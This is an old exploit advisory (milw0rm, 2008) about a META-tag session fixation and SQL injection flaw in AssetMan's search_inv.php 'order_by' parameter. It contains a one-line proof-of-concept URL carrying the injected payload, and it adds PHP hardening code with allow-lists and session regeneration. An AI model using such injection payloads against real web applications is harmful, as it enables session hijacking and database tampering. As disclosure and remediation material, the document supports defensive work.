AssetMan v2.5b SQL Injection using Session Fixation Attack

============================================================
AssetMan v2.5-b SQL Injection using Session Fixation Attack
============================================================

AUTHOR : Neo Anderson & Rohit Bansal
DATE   : 19th Sept, 2008
Email  : neo.whizzy@gmail.com & rohitisback@gmail.com

#####################################################

# Site     : http://www.bctree.com/~assetman
# Bug      : SQL Injection using Session Fixation Attack
# File     : search_inv.php
# Variable : GET variable 'order_by'

#####################################################

# Impact of Vulnerability:

By exploiting this vulnerability, an attacker may conduct a session fixation attack. In a session fixation attack, the attacker fixes the user's session ID before the user even logs into the target server, thereby eliminating the need to obtain the user's session ID afterwards.

#####################################################

# Bug explanation - Session Fixation Attack/Meta Tag Exploitation:

By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the browser. Attackers will normally manipulate cookie values to fraudulently authenticate themselves on a web site.

#####################################################

# PoC:

http://127.0.0.1/assetman/search_inv.php?action=search_all&order_by=%3Cmeta+http-equiv='Set-cookie'+content='=value'%3E&order=DESC+limit+1,1--
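
Server-side hardening for the two parameters used in the PoC, added here as an example; it is not code from AssetMan or from the advisory's authors. It assumes search_inv.php places order_by and order into an ORDER BY clause and writes request values back into the page; the column names and function names are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical column names: the advisory does not show AssetMan's schema.
const SORTABLE_COLUMNS = ['asset_tag', 'description', 'location', 'purchase_date'];

/**
 * Build the ORDER BY clause from request parameters using allow-lists.
 * Identifiers and keywords cannot be bound as prepared-statement
 * parameters, so they are matched against fixed lists instead.
 */
function build_order_clause(array $params): string
{
    $column = $params['order_by'] ?? '';
    $direction = $params['order'] ?? '';

    // order_by[]=x arrives as an array; anything that is not an exact
    // allow-list match falls back to a safe default.
    if (!is_string($column) || !in_array($column, SORTABLE_COLUMNS, true)) {
        $column = SORTABLE_COLUMNS[0];
    }
    if (!is_string($direction) || !in_array(strtoupper($direction), ['ASC', 'DESC'], true)) {
        $direction = 'ASC';
    }
    return sprintf('ORDER BY %s %s', $column, strtoupper($direction));
}

/** Encode any request value that is written back into the HTML page. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Call once credentials are verified, so a pre-set session ID is discarded. */
function start_authenticated_session(int $userId): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        ini_set('session.use_strict_mode', '1');   // reject IDs the server did not issue
        ini_set('session.use_only_cookies', '1');  // no session IDs in URLs
        session_start();
    }
    session_regenerate_id(true);                   // new ID, old session file deleted
    $_SESSION['user_id'] = $userId;
}

// Constructed input mirroring the decoded parameters of the PoC above.
$poc = ['order_by' => "<meta http-equiv='Set-cookie' content='=value'>",
        'order'    => 'DESC limit 1,1--'];
echo build_order_clause($poc), PHP_EOL;
```

Both PoC values fail the allow-list, so the query falls back to the default column and direction, and neither the META tag nor the trailing SQL reaches the database or the rendered page.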

#####################################################
# GreeTz
InfySec, str0ke & EvilFingers

www.infysec.com
www.evilfingers.com

#####################################################

# milw0rm.com [2008-09-18]

Neo Anderson 09/18/2008